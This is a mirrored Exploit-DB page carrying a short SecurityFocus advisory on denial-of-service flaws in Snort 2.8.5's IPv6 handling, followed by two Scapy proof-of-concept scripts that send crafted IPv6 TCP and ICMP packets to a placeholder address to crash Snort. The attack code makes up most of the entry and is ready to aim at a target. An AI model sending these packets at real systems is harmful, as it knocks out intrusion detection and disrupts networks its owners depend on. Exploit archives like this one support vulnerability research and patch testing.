bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/dos/33306.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

25 lines
No EOL
856 B
Text
Raw Blame History

source: https://www.securityfocus.com/bid/36795/info
Snort is prone to multiple denial-of-service vulnerabilities because the application fails to properly process specially crafted IPv6 packets.
Attackers can exploit these issues to crash the affected application, causing denial-of-service conditions.
These issues affect Snort 2.8.5; other versions may also be vulnerable.
You can reproduce theses two differents bugs easily by using the Python low-level networking lib Scapy
(http://www.secdev.org/projects/scapy/files/scapy-latest.zip)
1) #only works on x86
#/usr/bin/env python
from scapy.all import *
u = "\x92"+"\x02" * 6
send(IPv6(dst="IPv6_addr_here", nh=6)/u) #nh6 -> TCP
2) # works x86,x64
#/usr/bin/env python
from scapy.all import *
z = "Q" * 30
send(IPv6(dst="IPv6_ADDR_HERE",nh=1)/ICMPv6NIQueryNOOP(type=4)/z) #nh1 -> icmp (not v6)
Reference in a new issue View git blame Copy permalink